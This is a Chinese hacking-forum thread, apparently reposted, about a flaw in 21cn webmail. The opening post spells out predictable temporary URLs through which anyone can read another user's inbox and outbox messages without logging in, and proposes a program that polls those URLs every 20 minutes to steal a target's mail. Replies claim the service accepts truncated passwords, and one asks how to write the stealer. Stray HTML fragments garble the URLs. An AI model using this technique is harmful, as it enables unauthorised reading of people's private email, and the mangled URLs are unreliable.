|
 | 作者: yimarong [yimarong]
 版主 |
登录 |
| 21cn的邮件系统的大BUG 我轻易地找到了21cn的邮件系统的大BUG。包括它的收费和免费系统!!用轻易的方法我就可以看任何21cn邮件用户信箱中的信件!!!!而且,这是一个根本系统漏洞。2 1cn难以短期内解决。21cn可能只能临时变变路径而已,问题难以短期解决。 我的办法是: 1:用户abc登陆后先后看了第1、2..封信。 2:如果此用户使用WEBMAIL的时间内或退出后30分钟内,在另外一台机器上IE地址栏内输入 http://webmail.21cn.net/tmp/a/abc src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/1/1/message.txt http://webmail.21cn.net/tmp/a/abc src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/1/2/message.txt ... 上面字符串中的 /a/ ,其中a是其用户名abc的首位字母。 无需登陆即可取得用户abc的第1、2...封信的原码,虽然有些内容是经过编码,但只要以扩展名为.eml另存到本地即可用OUTLOOK看到全部内容。这是个大漏洞,谁都可以轻易利用。而且举一个很简单的例子: 我想窃取abc的信,只要用户abc是21cn的用户,且可能会使用21cn的web方式收发信,那么我只要编写一个程序,每20分钟轮流访问一遍下列地址:看abc收件箱里的内容 http://webmail.21cn.net/tmp/a/abc src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/1/1/message.txt http://webmail.21cn.net/tmp/a/abc src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/1/2/message.txt ... http://webmail.21cn.net/tmp/a/abc src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/1/500/message.txt 看abc发件箱的内容 http://webmail.21cn.net/tmp/a/abc src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/2/1/message.txt http://webmail.21cn.net/tmp/a/abc src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/2/2/message.txt ... http://webmail.21cn.net/tmp/a/abc src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/2/500/message.txt 只要此程序一直运行,用户在WEB上的查看后的信件没有一封能够逃掉。 |
| 地主 发表时间: 07/08 22:42 |
 | 回复: city742 [city742]  论坛用户 |
登录 |
|
我曾经上传附件到21cn的邮箱,然后取得路径,在一定时间内在不同的地点,任何机子上都可以用那个url下载文件。呵呵~~~传文件挺方便。 |
| B1层 发表时间: 07/09 13:51 |
 | 回复: hcz [hcz] 论坛用户 |
登录 |
|
这也叫bug啊,随便哪个都可以的,163,shou,的只要有人登陆过邮箱,在没有清理上网记录,没有关机的情况下,输入路径一样可以进邮箱 |
| B2层 发表时间: 07/09 13:57 |
| 回复: tmxk [tmxk]  论坛用户 |
登录 |
|
当然叫bug, 非授权用户是不应该被允许如此访问的。 只是我没看明白那个提交方式。连起来?还是单独输入? |
| B3层 发表时间: 07/09 15:11 |
 | 回复: mingda [mingda]  论坛用户 |
登录 |
|
21CN的密码可以少输一位```` 多一两位密码也可以进```` |
| B4层 发表时间: 07/11 19:21 |
| 回复: city742 [city742] 论坛用户 |
登录 |
|
楼上的说什么呢?!我怎么不明白?是不是你的密码太长了,后面的根本不管用呀?!!? |
| B5层 发表时间: 07/11 23:56 |
| 回复: group [group] 论坛用户 |
登录 |
|
确实是bug,猜到了他们的Tmp目录,而他们对Tmp目录没有做好防范,sigh |
| B6层 发表时间: 07/12 09:07 |
 | 回复: hackerkill [hackerkill] 论坛用户 |
登录 |
|
楼主的那个程序怎么编啊?我有兴趣知道,谢谢指教 |
| B7层 发表时间: 10/16 20:49 |
 | 回复: abctm [abctm]  版主 |
登录 |
|
我好像记得只要使用同一字符的密码,少输入几个也可以进入的 |
| B8层 发表时间: 10/17 21:44 |
 | 回复: xlinz [xlinz] 论坛用户 |
登录 |
|
利害! |
| B9层 发表时间: 11/28 11:29 |
 | 回复: whq1015 [whq1015]  论坛用户 |
登录 |
|
有意思 |
| B10层 发表时间: 12/03 13:47 |
 | 回复: telent3389 [telent3389] 论坛用户 |
登录 |
|
好象不行哦。 可能是有些地方没有懂吧 |
| B11层 发表时间: 12/04 11:11 |
| 回复: sungod [sungod] 论坛用户 |
登录 |
|
dg |
| B12层 发表时间: 12/06 14:31 |
 | 回复: happyname [happyname]  论坛用户 |
登录 |
|
我也试过,在21CN里,密码少输入一符号也可以进入邮箱~ |
| B13层 发表时间: 12/07 02:11 |
 | 回复: lgf [lgf] 论坛用户 |
登录 |
|
有时间我一定去试试 |
| B14层 发表时间: 12/09 18:31 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 黑客进阶 标题: 21cn的邮件系统的大BUG`(转)